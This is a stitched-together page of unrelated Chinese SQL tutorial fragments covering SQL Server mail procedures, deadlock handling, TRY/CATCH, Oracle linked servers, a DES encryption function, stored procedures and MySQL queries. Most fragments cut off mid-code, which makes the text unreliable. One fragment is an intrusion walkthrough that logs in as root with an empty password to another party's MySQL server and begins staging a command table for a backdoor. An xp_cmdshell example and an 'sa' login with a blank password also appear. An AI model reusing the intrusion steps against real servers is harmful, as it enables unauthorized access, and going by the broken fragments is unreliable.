PHP入门

使用SQL Mail收发和自动处理邮件中的扩展存储过程简介
SQL SERVER提供了通过EXCHANGE或OUTLOOK收发邮件的扩展存储过程，下面将这几个过程简单的介绍一下。
　
一、启动SQL Mail
xp_startmail @user,@password
@user和@password都是可选的
也可打开Enterprise Manager中的Support Services，在SQL Mail上单击右键打开右键菜单，然后按Start来启动
二、停止SQL Mail
xp_stopmail
也可用上述方法中的菜单里的Stop来停止
三、发送邮件
xp_sendmail {[@recipients =] 'recipients [;...n]'}
[,[@message =] 'message>
[,[@query =] 'query>
[,[@attachments =] attachments]
[,[@copy_recipients =] 'copy_recipients [;...n]'
[,[@blind_copy_recipients =] 'blind_copy_recipients [;...n]'
[,[@subject =] 'subject>
[,[@type =] 'type>
[,[@attach_results =] 'attach_value>
[,[@no_output =] 'output_value>
[,[@no_header =] 'header_value>
[,[@width =] width]
[,[@separator =] 'separator>
[,[@echo_error =] 'echo_value>
[,[@set_user =] 'user>
[,[@dbuse =] 'database>
其中@recipients是必需的
参数说明：
参数 说明
@recipients 收件人，中间用逗号分开
@message 要发送的信息
@query 确定执行并依附邮件的有效查询，除触发器中的插入表及删除表外，此查询能引用任何对象
@attachments 附件
@copy_recipients 抄送
@blind_copy_recipients 密送
@subject 标题
@attach_results 指定查询结果做为附件发送
@no_header 不发送查询结果的列名
@set_user 查询联接的用户名，默认为Guset
@dbuse 查询所用的数据库，默认为缺省数据库
四、阅读邮件收件箱中的邮件
xp_readmail [[@msg_id =] 'message_number> [, [@type =] 'type' [OUTPUT]]
[,[@peek =] 'peek>
[,[@suppress_attach =] 'suppress_attach>
[,[@originator =] 'sender' OUTPUT]
[,[@subject =] 'subject' OUTPUT]
[,[@message =] 'message' OUTPUT]
[,[@recipients =] 'recipients [;...n]' OUTPUT]
[,[@cc_list =] 'copy_recipients [;...n]' OUTPUT]

/*--处理死锁
查看当前进程,或死锁进程,并能自动杀掉死进程
因为是针对死的,所以如果有死锁进程,只能查看死锁进程
当然,你可以通过参数控制,不管有没有死锁,都只查看死锁进程
--邹建 2004.4--*/
/*--调用示例
exec p_lockinfo
--*/
create proc p_lockinfo
@kill_lock_spid bit=1, --是否杀掉死锁的进程,1 杀掉, 0 仅显示
@show_spid_if_nolock bit=1 --如果没有死锁的进程,是否显示正常进程信息,1 显示,0 不显示
as
declare @count int,@s nvarchar(1000),@i int
select id=identity(int,1,1),标志,
进程ID=spid,线程ID=kpid,块进程ID=blocked,数据库ID=dbid,
数据库名=db_name(dbid),用户ID=uid,用户名=loginame,累计CPU时间=cpu,
登陆时间=login_time,打开事务数=open_tran, 进程状态=status,
工作站名=hostname,应用程序名=program_name,工作站进程ID=hostprocess,
域名=nt_domain,网卡地址=net_address
into #t from(
select 标志='死锁的进程',
spid,kpid,a.blocked,dbid,uid,loginame,cpu,login_time,open_tran,
status,hostname,program_name,hostprocess,nt_domain,net_address,
s1=a.spid,s2=0
from master..sysprocesses a join (
select blocked from master..sysprocesses group by blocked
)b on a.spid=b.blocked where a.blocked=0
union all
select '|_牺牲品_>',
spid,kpid,blocked,dbid,uid,loginame,cpu,login_time,open_tran,
status,hostname,program_name,hostprocess,nt_domain,net_address,
s1=blocked,s2=1
from master..sysprocesses a where blocked<>0
)a order by s1,s2
select @count=@@rowcount,@i=1
if @count=0 and @show_spid_if_nolock=1
begin
insert #t
select 标志='正常的进程',
spid,kpid,blocked,dbid,db_name(dbid),uid,loginame,cpu,login_time,
open_tran,status,hostname,program_name,hostprocess,nt_domain,net_address
from master..sysprocesses
set @count=@@rowcount
end
if @count>0
begin
create table #t1(id int identity(1,1),a nvarchar(30),b Int,EventInfo nvarchar(255))
if @kill_lock_spid=1

sql server 2005中新增加的try catch，可以很容易捕捉异常了，今天大概学习看了下，归纳下要点如下
基本用法BEGIN TRY
{ sql_statement |
statement_block }
END TRY
BEGIN CATCH
{ sql_statement |
statement_block }
END CATCH
，和普通语言的异常处理用法差不多，但要注意的是，SQL SERVER只捕捉那些不是严重的异常，当比如数据库不能连接等这类异常时，是不能捕捉的一个例子：BEGIN TRY
DECLARE @X INT
-- Divide by zero to generate Error
SET @X = 1/0
PRINT 'Command after error in TRY block'
END TRY
BEGIN CATCH
PRINT 'Error Detected'
END CATCH
PRINT 'Command after TRY/CATCH blocks'
另外try catch可以嵌套Begin TRY
delete from GrandParent where Name = 'John Smith'
print 'GrandParent deleted successfully'
End Try
Begin Catch
Print 'Error Deleting GrandParent Record'
Begin Try
delete from Parent where GrandParentID =
(select distinct ID from GrandParent where Name = 'John Smith')
Print 'Parent Deleted Successfully'
End Try
Begin Catch
print 'Error Deleting Parent'
Begin Try
delete from child where ParentId =
(select distinct ID from Parent where GrandParentID =
(select distinct ID from GrandParent where Name = 'John Smith'))
print 'Child Deleted Successfully'
End Try
Begin Catch
Print 'Error Deleting Child'
End Catch
End Catch
End Catch
另外，SQL SERVER 2005在异常机制中，提供了error类的方法方便调试，现摘抄如下，比较简单，不予以解释ERROR_NUMBER(): Returns a number associated with the error.ERROR_SEVERITY(): Returns the severity of the error.ERROR_STATE(): Returns the error state number associated with the error.ERROR_PROCEDURE(): Returns the name of the stored procedure or trigger in which the error occurred.ERROR_LINE(): Returns the line number inside the failing routine that caused the error. ERROR_MESSAGE(): Returns the complete text of the error message. The text includes the values supplied for any substitutable parameters, such as lengths, object names, or times. 最后举例子如下，使用了error类的方法BEGIN TRY

昨天说的是用ENTERPRISE MANAGER设置ORACLE的LINKED SERVER，今天说一下对于相同的设置在Query Analyzer中使用系统过程进行的方法。
在Enterprise Manager中，设置时有以下三部分：
一、服务器名和服务器类型
二、服务器的服务器选项
三、安全
在用存储设置时也分这三部分
步骤：
一、添加服务器
使用 sp_addlinkedserver 过程，所要使用的参数如下：
@server “LINKED SERVER”
@srvproduct “Product name”
@provider “Provider”
@datasrc “Data source”
二、设置服务器选项
使用 sp_serveroption 过程，所要使用的参数如下：
@server “Linked server”
@optname “RPC”或“RPC OUT”
@optvalue True 或 False
三、添加Login
使用 sp_addlinkedsrvlogin 过程，所要使用的参数如下：
@rmtsrvname “Linked server”
@useself True 或 False
@locallogin 本地LOGIN
@rmtuser 远程用户
@rmtpassword 远程用户口令
应用实例代码
exec sp_addlinkedserver 'Oracleserver','Oracle','MSDAORA','Oracleserver'
exec sp_serveroption 'Oracleserver','rpc.out','True'
exec sp_serveroption 'Oracleserver','rpc','True'
exec sp_addlinkedsrvlogin 'Oracleserver','False',null,'sa',''
因小弟英文水平有限，借助词霸虽说可以看懂前面几个过程的帮助，但翻译不出来，只好把自己当时设置时的源代码放上来，不求能全部说明白，只要大家借助这段码能够少走冤路也就达到目的了。
上述代码在UNIX ORACLE7和NT4 SP5 SQL7上测试成功。

SQL2005支持在SQL SERVER里部署.net应用程序了，那么以前一直写在.net里的一些运算如加密等已经完全可以移到sql里来进行了，而不需要再从程序中运算了，使数据库可以和程序相对独立开来，方便了不少。
前阵子，需要给数据加密，所以写了个3DES加密函数部署到SQL2005中，当然,现在秘钥也作为一个表存在在数据库中,至于这个密钥,以后可以考虑用usb-key使用rsa加密或者别的方式进行加密,以保证数据安全。现在先说怎么实现部署到sqlserver中的加密函数吧。
新建一个项目。VB中的database-->SQL Server Project，我新建了以后叫做DESCryptoService的项目，之后，会让你添加数据库引用，选择你要部署到的数据库。
写入如下代码，就OK了
Imports System
Imports System.Data
Imports System.Data.SqlClient
Imports System.Data.SqlTypes
Imports Microsoft.SqlServer.Server
Imports System.IO
Imports System.Xml
Imports System.Text
Imports System.Security.Cryptography
Partial Public Class EncryptToBase64DecryptFromBase64Class EncryptToBase64DecryptFromBase64
<Microsoft.SqlServer.Server.SqlFunction()> _
Public Shared Function EncryptToBase64String()Function EncryptToBase64String(ByVal stringToEncryptsql As SqlString, ByVal SEncryptionKeysql As SqlString) As SqlString
Dim stringToEncrypt As String = CType(stringToEncryptsql, String)
Dim SEncryptionKey As String = CType(SEncryptionKeysql, String)
Dim IV() As Byte = {&H12, &H34, &H56, &H78, &H90, &HAB, &HCD, &HEF}
Dim key() As Byte = {}
Try
key = System.Text.Encoding.UTF8.GetBytes(Left(SEncryptionKey, 8))
Dim des As New DESCryptoServiceProvider()
Dim inputByteArray() As Byte = Encoding.UTF8.GetBytes(stringToEncrypt)
Dim ms As New MemoryStream()
Dim cs As New CryptoStream(ms, des.CreateEncryptor(key, IV), CryptoStreamMode.Write)
cs.Write(inputByteArray, 0, inputByteArray.Length)
cs.FlushFinalBlock()

MYSQL用户ROOT密码为空时是一个很大的漏洞，在网上也有许多一些利用此漏洞的方法，一般就是写一个ASP或PHP的后门，不仅很麻烦，而且还要猜解网站的目录，如果对方没有开IIS，那我们岂不没办法了？？

后来，自己思索想到一个办法，且在测试的几台有此漏洞的机中均获得了成功，现将攻击方法公布如下：

1、连接到对方MYSQL 服务器

mysql -u root -h 192.168.0.1

mysql.exe 这个程序在你安装了MYSQL的的BIN目录中

2、让我们来看看服务器中有些什么数据库

mysql>show databases;

MYSQL默认安装时会有MYSQL、TEST这两个数据库，如果你看到有其它的数据库那么就是用户自建的数据库。

3、让我们进入数据库

mysql>use test;

我们将会进入test数据库中

4、查看我们进入数据库中有些什么数据表

mysql>show tables;

默认的情况下，test中没有任何表的存在。

以下为关键的部分

5、在TEST数据库下创建一个新的表；

mysql>create table a (cmd text);

好了，我们创建了一个新的表，表名为a，表中只存放一个字段，字段名为cmd，为text文本。

6、在表中插入内容

存储过程入门与提高
什么是存储过程呢？
定义：
将常用的或很复杂的工作，预先用SQL语句写好并用一个指定的名称存储起来, 那么以后要叫数据库提供与已定义好的存储过程的功能相同的服务时,只需调用execute,即可自动完成命令。
讲到这里,可能有人要问：这么说存储过程就是一堆SQL语句而已啊？
Microsoft公司为什么还要添加这个技术呢?
那么存储过程与一般的SQL语句有什么区别呢?
存储过程的优点：
1.存储过程只在创造时进行编译，以后每次执行存储过程都不需再重新编译，而一般SQL语句每执行一次就编译一次,所以使用存储过程可提高数据库执行速度。
2.当对数据库进行复杂操作时(如对多个表进行Update,Insert,Query,Delete时），可将此复杂操作用存储过程封装起来与数据库提供的事务处理结合一起使用。
3.存储过程可以重复使用,可减少数据库开发人员的工作量
4.安全性高,可设定只有某此用户才具有对指定存储过程的使用权
存储过程的种类：
1.系统存储过程：以sp_开头,用来进行系统的各项设定.取得信息.相关管理工作,
如 sp_help就是取得指定对象的相关信息
2.扩展存储过程 以XP_开头,用来调用操作系统提供的功能
exec master..xp_cmdshell 'ping 10.8.16.1'
3.用户自定义的存储过程,这是我们所指的存储过程
常用格式
Create procedure procedue_name
[@parameter data_type][output]
[with]{recompile|encryption}
as
sql_statement
解释:
output：表示此参数是可传回的
with {recompile|encryption}
recompile:表示每次执行此存储过程时都重新编译一次
encryption:所创建的存储过程的内容会被加密
如:
表book的内容如下
编号 书名 价格
001 C语言入门 $30
002 PowerBuilder报表开发 $52
实例1:查询表Book的内容的存储过程
create proc query_book
as
select * from book
go
exec query_book

1. 选用适合的ORACLE优化器
ORACLE的优化器共有3种:
a. RULE (基于规则) b. COST (基于成本) c. CHOOSE (选择性)
设置缺省的优化器,可以通过对init.ora文件中OPTIMIZER_MODE参数的各种声明,如RULE,COST,CHOOSE,ALL_ROWS,FIRST_ROWS . 你当然也在SQL句级或是会话(session)级对其进行覆盖.
为了使用基于成本的优化器(CBO, Cost-Based Optimizer) , 你必须经常运行analyze 命令,以增加数据库中的对象统计信息(object statistics)的准确性.
如果数据库的优化器模式设置为选择性(CHOOSE),那么实际的优化器模式将和是否运行过analyze命令有关. 如果table已经被analyze过, 优化器模式将自动成为CBO , 反之,数据库将采用RULE形式的优化器.
在缺省情况下,ORACLE采用CHOOSE优化器, 为了避免那些不必要的全表扫描(full table scan) , 你必须尽量避免使用CHOOSE优化器,而直接采用基于规则或者基于成本的优化器.
2. 访问Table的方式
ORACLE 采用两种访问表中记录的方式:
a. 全表扫描
全表扫描就是顺序地访问表中每条记录. ORACLE采用一次读入多个数据块(database block)的方式优化全表扫描.
b. 通过ROWID访问表
你可以采用基于ROWID的访问方式情况,提高访问表的效率, , ROWID包含了表中记录的物理位置信息..ORACLE采用索引(INDEX)实现了数据和存放数据的物理位置(ROWID)之间的联系. 通常索引提供了快速访问ROWID的方法,因此那些基于索引列的查询就可以得到性能上的提高.

SQL功能与特性
　　其实，在前面的文章中，已经提及SQL命令的一些基本功能，然而，通过SQL命令，程序设计师或数据库管理员（DBA）可以：
　　（一）建立数据库的表格。（包括设置表格所可以使用之空间）
　　（二）改变数据库系统环境设置。
　　（三）针对某个数据库或表格，授予用户存取权限。
　　（四）对数据库表格建立索引值。
　　（五）修改数据库表格结构。（新建、删除或是修改表格字段）
　　（六）对数据库进行数据的新建。
　　（七）对数据库进行数据的删除。
　　（八）对数据库进行数据的修改。
　　（九）对数据库进行数据的查询。
　　这几项便是通过SQL命令可以完成的事情，看起来是不是比起“查询”两个字所代表的功能要多的多了呢？
　　SQL语法的分类
　　其实SQL命令并不是非常多，可是要把SQL用到出神入化，却也只需要短短几个命令便够，因为SQL命令是针对关系型数据库所建立出来的语法叙述，所以SQL在这类数据库中所发挥的功能非常的强，以下将针对在VB中常用的SQL语法基本命令加以分类介绍。在说明SQL的命令以及使用语法之前，以下将SQL做了的分类，在致上SQL语法所使用到的类型，可以说都已包含在这些类别当中。
　　第一类、属性词（Predicates）
　　在SQL命令中用来指明所要选择的记录的方式。如ALL、TOP与DISTINCT等等。
　　第二类、声明（Declaration）
　　针对SQL Parameter或Parameter Query 的名称与数据类型做声明，如PARAMETERS的声明等等。
　　第三类、条件子句（Clause）
　　在SQL的查询中，利用一些表达式定义出查询的条件，以缩小寻找的范围，如WHERE。
　　第四类、运算符（Operator）与操作数（Operation）
　　在SQL的查询中，与Operation共同组成表达式（Expression），如BETWEEN....AND 运算符与INNER JOIN操作数。
　　第五类、函数（Function）
　　一些SQL常见的函数，像是AVG()是求算数平均数的函数。
　　第六类、SQL语句（Statement）
　　SQL的语句，可以说是SQL语法的主体，用来对某一个特定的数据库发出指示，并返回相关的数据，而SQL的语法结构，基本上可以利用下面
　　的式子来表示：命令＋条件子句
　　例如：
　　SELECT*FROM TAB WHERE TAB.NAME='A'
　　其中的“FROM....WHERE”便是一个条件子句，其实SQL的语法并不难，您只需记住这样的一个规则，相信可以很快的了解SQL用法。

本来,用W3C格式就可以了
问题是,有时候,你可能想将日志记录到另一台服务器上,这样,就算有问题,日志不会丢掉
再说,用SQL做日志记录还有一个好处,就是方便在代码中访问和查询,以及统计工作
这个统计,再准确不过了
而且,用SQL记录站点日志,本身也不复杂
1,在目标服务器的SQL里建个数据库,例如,YAOANLOG
2,在该数据库里运行IIS自带的日志表生成脚本 ,这个脚本是在IIS服务器的文件夹:c:windowssystem32inetsrv下,名叫logtemp.sql,运行它,会生成一个名叫inetlog的数据表
3,在IIS服务器上,打开ODBC管理器,建立一个系统DSN,DSN名叫YAOANLOG,驱动选择SQL SERVER,服务器就输入SQL SERVER服务器的IP地址,验证,SQL SERVER验证,输入用户名和密码,数据库选择刚建好的YAOANLOG数据库,最后,测试,通过了就OK
4,打开IIS管理器,选择要记录日志的站点,在日志格式里,选ODBC方式
接下来,点属性
在属性里,DSN名称,输入YaoAnLog
表名,输入inetlog
用户名,输入你的SQL SERVER用户名,密码,输入密码
最后,按确定,会要求再输入一遍密码
确认完成后,停止该站点,并重新启动该站点即可
如果设置没有问题,连接目标SQL SERVER服务器后,用查询分析器,你应该可以看到访问的日志记录了
另外,IIS的帮助里,提到了一句:"如果使用ODBC日志的话,IIS会停用核心缓存,性能将受到影响"
所以,如非必要的话,尽量不要使用哟

 
      数据表都已经创建起来了，假设我们已经插入了许多的数据，我们就可以用自己喜欢的方式对数据表里面的信息进行检索和显示了，比如说：可以象下面这样把整个数据表内的内容都显示出来
            select * from president;
      也可以只选取某一个数据行里的某一个数据列
            select birth from president where last_name=’Eisenhower’;
      select语句的通用形式如下：
            select 你要的信息
            from 数据表(一个或多个)
            where 满足的条件
      select语句有几个子句，他们的各种搭配能帮你查出最感兴趣的信息，这些子句可以很简单，也可以很复杂,看看作者是如何详细讲解的
１，            用各种操作符来设定检索条件
      要想让select语句只把满足特定条件的记录检索出来，就必须给它加上where字句来设置数据行的检索条件。只有这样，才能有选择地把数据列的取值满足特定要求的那些数据行挑选出来。可以针对任何类型的值进行查找，比如说，对数值进行搜索
select * from score where score>95; //显示所有分数在９５分以上的信息
      也可以针对字符串值进行查找
select last_name,first_name from president where last_name=’Tom’; //找出所有姓tom的总统
      还可以对不同类型的值进行组合查找
select last_name,first_name,birth,state from president
where birth<’1950-1-1’ and (state=’VA’ or state=’BA’);
      //找出1950年前出生于VA州或ＢＡ州的总统
      可见 where子句中可以使用的是算术操作符（+-*/%）,比较操作符(<>=)以及逻辑运算符，我们应该熟练理解这些操作符的含义（都很简单）

/*
'bcp' 不是内部或外部命令，也不是可运行的程序？
看看在C:Program FilesMicrosoft SQL Server80ToolsBinn里面有没有bcp.exe这个文件
然后看看path里面加C:Program FilesMicrosoft SQL Server80ToolsBinn这个目录没有.
右键我的电脑--属性--高级--环境变量--在系统变量中找到path--编辑
在变量值的最后加上:
C:Program FilesMicrosoft SQL Server80ToolsBINN
*/
/**********************************************************************
存储过程: P_SaveXML
功能: 生成XML文件
参数: 表名
返回: 指定目录的XML文件
调用方法: 传递中间表TB_TABLECOLUMN_T存在的表名
exec P_ZehuaSavexml 'WQ_STINFO_B,WQ_PHY_D','D:xx.xml'
最后更改日期: 2005-8-17
联系方式: